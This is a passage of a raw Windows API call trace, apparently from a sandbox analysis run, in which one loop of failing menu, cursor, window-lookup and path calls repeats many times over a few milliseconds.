[0027.640] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x223) returned -1 [0027.640] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.640] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.640] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.640] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.640] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.640] GetStockObject (i=6) returned 0x1b00018 [0027.640] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.640] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.640] PathFileExistsW (pszPath=0x0) returned 0 [0027.640] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.640] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.640] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.640] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.640] GetMenu (hWnd=0x0) returned 0x0 [0027.640] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.641] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.641] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.641] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.641] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.641] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.641] GetStockObject (i=6) returned 0x1b00018 [0027.641] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.641] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.641] PathFileExistsW (pszPath=0x0) returned 0 [0027.641] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.641] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.641] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.641] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.641] GetMenu (hWnd=0x0) returned 0x0 [0027.641] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.641] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.641] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.641] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.641] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.641] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.641] GetStockObject (i=6) returned 0x1b00018 [0027.641] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.641] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.641] PathFileExistsW (pszPath=0x0) returned 0 [0027.641] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.641] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.641] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.641] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.641] GetMenu (hWnd=0x0) returned 0x0 [0027.641] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.641] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.641] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.641] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.642] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.642] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.642] GetStockObject (i=6) returned 0x1b00018 [0027.642] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.642] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.642] PathFileExistsW (pszPath=0x0) returned 0 [0027.642] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.642] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.642] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.642] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.642] GetMenu (hWnd=0x0) returned 0x0 [0027.642] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.642] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.642] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.642] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.642] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.642] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.642] GetStockObject (i=6) returned 0x1b00018 [0027.642] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.642] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.642] PathFileExistsW (pszPath=0x0) returned 0 [0027.642] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.642] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.642] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.642] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.642] GetMenu (hWnd=0x0) returned 0x0 [0027.642] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x18d) returned -1 [0027.642] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.642] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.642] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.642] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.642] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.642] GetStockObject (i=6) returned 0x1b00018 [0027.643] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.643] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.643] PathFileExistsW (pszPath=0x0) returned 0 [0027.643] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.643] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.643] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.643] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.643] GetMenu (hWnd=0x0) returned 0x0 [0027.643] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.643] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.643] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.643] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.643] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.643] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.643] GetStockObject (i=6) returned 0x1b00018 [0027.643] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.643] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.643] PathFileExistsW (pszPath=0x0) returned 0 [0027.643] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.643] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.643] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.643] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.643] GetMenu (hWnd=0x0) returned 0x0 [0027.643] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.643] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.643] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.643] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.643] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.643] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.643] GetStockObject (i=6) returned 0x1b00018 [0027.643] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.643] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.643] PathFileExistsW (pszPath=0x0) returned 0 [0027.643] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.643] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.644] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.644] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.644] GetMenu (hWnd=0x0) returned 0x0 [0027.644] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.644] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.644] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.644] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.644] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.644] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.644] GetStockObject (i=6) returned 0x1b00018 [0027.644] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.644] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.644] PathFileExistsW (pszPath=0x0) returned 0 [0027.644] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.644] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.644] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.644] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.644] GetMenu (hWnd=0x0) returned 0x0 [0027.644] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.644] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.644] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.644] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.644] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.644] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.644] GetStockObject (i=6) returned 0x1b00018 [0027.644] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.644] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.644] PathFileExistsW (pszPath=0x0) returned 0 [0027.644] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.644] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.644] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.644] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.644] GetMenu (hWnd=0x0) returned 0x0 [0027.645] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xd3) returned -1 [0027.645] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.645] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.645] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.645] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.645] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.645] GetStockObject (i=6) returned 0x1b00018 [0027.645] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.645] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.645] PathFileExistsW (pszPath=0x0) returned 0 [0027.645] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.645] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.645] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.645] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.645] GetMenu (hWnd=0x0) returned 0x0 [0027.645] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.645] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.645] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.645] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.645] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.645] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.645] GetStockObject (i=6) returned 0x1b00018 [0027.645] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.645] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.645] PathFileExistsW (pszPath=0x0) returned 0 [0027.645] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.645] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.645] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.645] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.645] GetMenu (hWnd=0x0) returned 0x0 [0027.645] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.645] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.646] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.646] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.646] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.646] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.646] GetStockObject (i=6) returned 0x1b00018 [0027.646] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.646] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.646] PathFileExistsW (pszPath=0x0) returned 0 [0027.646] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.646] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.646] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.646] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.646] GetMenu (hWnd=0x0) returned 0x0 [0027.646] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.646] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.646] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.646] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.646] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.646] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.646] GetStockObject (i=6) returned 0x1b00018 [0027.646] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.646] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.646] PathFileExistsW (pszPath=0x0) returned 0 [0027.646] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.646] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.646] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.646] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.646] GetMenu (hWnd=0x0) returned 0x0 [0027.646] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.646] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.646] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.646] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.646] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.646] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.647] GetStockObject (i=6) returned 0x1b00018 [0027.647] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.647] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.647] PathFileExistsW (pszPath=0x0) returned 0 [0027.647] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.647] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.647] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.647] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.647] GetMenu (hWnd=0x0) returned 0x0 [0027.647] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2c6) returned -1 [0027.647] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.647] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.647] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.647] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.647] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.647] GetStockObject (i=6) returned 0x1b00018 [0027.647] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.647] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.647] PathFileExistsW (pszPath=0x0) returned 0 [0027.647] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.647] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.647] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.647] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.647] GetMenu (hWnd=0x0) returned 0x0 [0027.647] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.647] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.647] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.647] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.647] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.647] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.647] GetStockObject (i=6) returned 0x1b00018 [0027.647] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.647] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.647] PathFileExistsW (pszPath=0x0) returned 0 [0027.648] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.648] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.648] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.648] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.648] GetMenu (hWnd=0x0) returned 0x0 [0027.648] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.648] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.648] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.648] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.648] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.648] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.648] GetStockObject (i=6) returned 0x1b00018 [0027.648] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.648] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.648] PathFileExistsW (pszPath=0x0) returned 0 [0027.648] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.648] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.648] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.648] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.648] GetMenu (hWnd=0x0) returned 0x0 [0027.648] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.648] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.648] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.648] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.648] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.648] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.648] GetStockObject (i=6) returned 0x1b00018 [0027.648] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.648] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.648] PathFileExistsW (pszPath=0x0) returned 0 [0027.648] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.648] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.648] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.649] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.649] GetMenu (hWnd=0x0) returned 0x0 [0027.649] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.649] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.649] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.649] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.649] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.649] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.649] GetStockObject (i=6) returned 0x1b00018 [0027.649] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.649] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.649] PathFileExistsW (pszPath=0x0) returned 0 [0027.649] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.649] GetCursorPos (in: lpPoint=0x18f5e4 | out: 